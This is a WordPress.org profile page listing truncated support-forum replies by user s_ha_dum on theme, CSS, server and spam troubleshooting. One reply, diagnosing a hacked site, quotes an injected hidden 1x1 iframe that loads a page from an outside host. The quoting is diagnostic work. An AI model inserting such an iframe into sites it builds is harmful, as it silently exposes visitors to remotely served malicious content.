WordPress.org

Profiles

s_ha_dum

Profile picture of s_ha_dum
  • Member Since: May 14th, 2007
  • @apljdi on WordPress.org
  • Find me on:

  • Posted a reply to Shortcodes in custom fields but only when present, on the site WordPress Support Forums:
    Ok. What you need to do is count the length of the content then decide…

    4 years ago

  • Posted a reply to Shortcodes in custom fields but only when present, on the site WordPress Support Forums:
    Then what are you trying to do? If you add the shortcode to the custom…

    4 years ago

  • Posted a reply to Website blocked due to "Proxy": Am I hacked? is it the hosting?, on the site WordPress Support Forums:
    It is your hosting. You are looking at a network/server level configuration issue. WordPress couldn't…

    4 years ago

  • Posted a reply to Shortcodes in custom fields but only when present, on the site WordPress Support Forums:
    But I only want to invoke the code if the shortcode is present in the…

    4 years ago

  • Posted a reply to Error opening wp-admin, on the site WordPress Support Forums:
    Yes, it works but it isn't fixed. The problem is here: $this->user->active_blog = $this->user->blogs[get_current_blog_id()]; That…

    4 years ago

  • Posted a reply to Unwanted Image Showing Up In Footer of Blog Homepage, on the site WordPress Support Forums:
    You are welcome. Sorry it took such a long path and all day.

    4 years ago

  • Posted a reply to Unwanted Image Showing Up In Footer of Blog Homepage, on the site WordPress Support Forums:
    Replace <?php the_content(); ?> with <?php // the_content(); ?>. That is a strange place for…

    4 years ago

  • Posted a reply to Unwanted Image Showing Up In Footer of Blog Homepage, on the site WordPress Support Forums:
    Wow... that is very different from what I was seeing before. The problem is right…

    4 years ago

  • Posted a reply to Unwanted Image Showing Up In Footer of Blog Homepage, on the site WordPress Support Forums:
    If you block currentlyobsessed.com's jQuery ( http://currentlyobsessed.me/js/jquery/jquery-1.7.min.js ) the problem goes away. This is allowing…

    4 years ago

  • Posted a reply to Error opening wp-admin, on the site WordPress Support Forums:
    It is in your theme-- "wp-content/themes/mytos/classes.php" on line 74. It is a non-fatal error so…

    4 years ago

  • Posted a reply to Unwanted Image Showing Up In Footer of Blog Homepage, on the site WordPress Support Forums:
    What that iframe does is pretty much completely determined by currentlyobsessed.com and by whatever mechanisms…

    4 years ago

  • Posted a reply to I keep getting 'Fatal Error Allowed memory23476584367 bytes exhausted'!!, on the site WordPress Support Forums:
    If you even come close to a theme needing 256MB of memory then I would…

    4 years ago

  • Posted a reply to Favicon Not working, on the site WordPress Support Forums:
    I read somewhere that you can save it as a .jpg and it will show.…

    4 years ago

  • Posted a reply to Unwanted Image Showing Up In Footer of Blog Homepage, on the site WordPress Support Forums:
    It has changed to that because I wrote a new post. Before that, it was…

    4 years ago

  • Posted a reply to E-mail notification ON by default, on the site WordPress Support Forums:
    I don't recall seeing this anywhere in WordPress Core. What plugins are you using?

    4 years ago

  • Posted a reply to Unwanted Image Showing Up In Footer of Blog Homepage, on the site WordPress Support Forums:
    That is a iframe linking to: "http://currentlyobsessed.me/api/v1/get_widget?wid=30&blog=Mirror+Me&widgetid=1870" Is that something you were trying to incorporate?

    4 years ago

  • Posted a reply to Favicon Not working, on the site WordPress Support Forums:
    Your favicon is not a favicon file. It is a TIFF. .ico is not just…

    4 years ago

  • Posted a reply to Custom CSS not working in Explorer or Firefox, on the site WordPress Support Forums:
    Sorry, I don't see what you do. The site looks virtually identical in Safari, Chrome,…

    4 years ago

  • Posted a reply to I keep getting 'Fatal Error Allowed memory23476584367 bytes exhausted'!!, on the site WordPress Support Forums:
    268435456 bytes is 256 megabytes, which is curiously higher than the limits you posted. Anyway,…

    4 years ago

  • Posted a reply to Custom CSS not working in Explorer or Firefox, on the site WordPress Support Forums:
    You have a bunch of style rules that start with '-webkit'. Any of those the…

    4 years ago

  • Posted a reply to 500 Internal Server Error - after 2 days of down server, on the site WordPress Support Forums:
    A 500 Internal Server Error normally relates to a problem with your htaccess file. Typically,…

    4 years ago

  • Posted a reply to Feat image link to page url ??, on the site WordPress Support Forums:
    echo '<div class="polaroidimage"><a href="'.get_permalink($page->ID).'" rel="bookmark"><img src="'.$feat_image.'"></a>';

    4 years ago

  • Posted a reply to 500 Internal Server Error - after 2 days of down server, on the site WordPress Support Forums:
    This is almost certainly a server configuration problem, or a DNS problem. Have you asked…

    4 years ago

  • Posted a reply to Bizarre Spam Attack Going On., on the site WordPress Support Forums:
    I know what you mean. I do. I wonder about some of the stuff spammers…

    4 years ago

  • Posted a reply to You do not have sufficient permissions to access this page., on the site WordPress Support Forums:
    Your user has not been properly created. I can't tell what is missing but something…

    4 years ago

  • Posted a reply to How to insert custom page excerpts onto main page?, on the site WordPress Support Forums:
    I need that on main page I would see excerpts of three particular pages. No…

    4 years ago

  • Posted a reply to Unable to access dashboard, on the site WordPress Support Forums:
    Those instructions really don't look right to me. They are certainly incomplete. Try: Moving WordPress…

    4 years ago

  • Posted a reply to custom loop w/ customized first post, on the site WordPress Support Forums:
    You need to use get_posts() and define a 'numberposts' parameter. That will allow you to…

    4 years ago

  • Posted a reply to Text is pale grey on first visit to Home page, on the site WordPress Support Forums:
    I log in using an IP address, but I think I'm probably not authorised to…

    4 years ago

  • Posted a reply to Text is pale grey on first visit to Home page, on the site WordPress Support Forums:
    It is CSS or Javascript, and is probably in your theme, but it is hard…

    4 years ago

  • Posted a reply to Hanging when accessing, editing and trying to open Posts, on the site WordPress Support Forums:
    One thing worries me: I have run WordPress on very cheap servers and the execution…

    4 years ago

  • Posted a reply to How to optimize Apache for WordPress?, on the site WordPress Support Forums:
    Again, still working through the details myself but... ServerLimit: The maximum number of processes that…

    4 years ago

  • Posted a reply to Text is pale grey on first visit to Home page, on the site WordPress Support Forums:
    ... what I can do to fix it? Without access, probably nothing, but what is…

    4 years ago

  • Posted a reply to WordPress (or browser) acting up, on the site WordPress Support Forums:
    @singnificand, 'random' in no more decriptive than 'residual'. If you want help you have to…

    4 years ago

  • Posted a reply to Hanging when accessing, editing and trying to open Posts, on the site WordPress Support Forums:
    It is really hard to debug remotely but it sounds like a timeout or a…

    4 years ago

  • Posted a reply to Mobile website won't scale logo, on the site WordPress Support Forums:
    Your style.css is empty but you have 11 other stylesheets and none of those are…

    4 years ago

  • Posted a reply to Background images appearing too magnified, on the site WordPress Support Forums:
    No, the background image is here: http://www.mungretgates.com/wp-content/uploads/2012/10/227-95.jpg You can see it in the stylesheet source.…

    4 years ago

  • Posted a reply to How to optimize Apache for WordPress?, on the site WordPress Support Forums:
    Some folks have suggested that I should abandon Apache/cPanel/PHP/mySQL and go with nginX/Varnish/PHP-FPM/SQLite No idea…

    4 years ago

  • Posted a reply to Mobile website won't scale logo, on the site WordPress Support Forums:
    See if #logo img {width:100%} does it. Add it to your theme's stylesheet.

    4 years ago

  • Posted a reply to My site hacked????, on the site WordPress Support Forums:
    Yup... definitely hacked.... <iframe src="http://osbasedreceiva.pl/img3/count.htm" width="1" height="1" frameborder="0"></iframe><br /> <b>Warning</b>: Cannot modify header information -…

    4 years ago

  • Posted a reply to How to Avoid 3 Diffent URL of the Same Category?, on the site WordPress Support Forums:
    I do not have that problem. I suspect there is something peculiar to your installation.…

    4 years ago

  • Posted a reply to Custom tempelate for Custom URL's, on the site WordPress Support Forums:
    Nevermind... sorry... double post somehow.

    4 years ago

  • Posted a reply to Custom tempelate for Custom URL's, on the site WordPress Support Forums:
    I think that all you need are a bunch of 'Pages'. Go to wp-admin->Page and…

    4 years ago

  • Posted a reply to Warning! Popular plugin in repository infects database and cannot be removed, on the site WordPress Support Forums:
    Couple of thoughts... I'm not sure that accusing it of 'infecting' the database is quite…

    4 years ago

  • Posted a reply to no localhost, on the site WordPress Support Forums:
    So now I find it with http://localhost:8888 Browsers assume port 80, standard for http, unless…

    4 years ago

  • Posted a reply to Bizarre Spam Attack Going On., on the site WordPress Support Forums:
    I can't however, for the life of me, figure out WHY are they spamming. There's…

    4 years ago

  • Posted a reply to Cron job rewriting URL, on the site WordPress Support Forums:
    Take a look at this thread: http://wordpress.org/support/topic/doing_wp_cron?replies=11

    4 years ago

  • Posted a reply to Cron job rewriting URL, on the site WordPress Support Forums:
    I'm sorry, what? I am using my host's cron panel for a job from a…

    4 years ago

  • Posted a reply to Bizarre Spam Attack Going On., on the site WordPress Support Forums:
    It isn't that weird. Fake content like that can get past some automatic filters and…

    4 years ago

  • Posted a reply to no localhost, on the site WordPress Support Forums:
    Installed WordPress where? Do you have a webserver running on 'localhost'-- aka, the computer you…

    4 years ago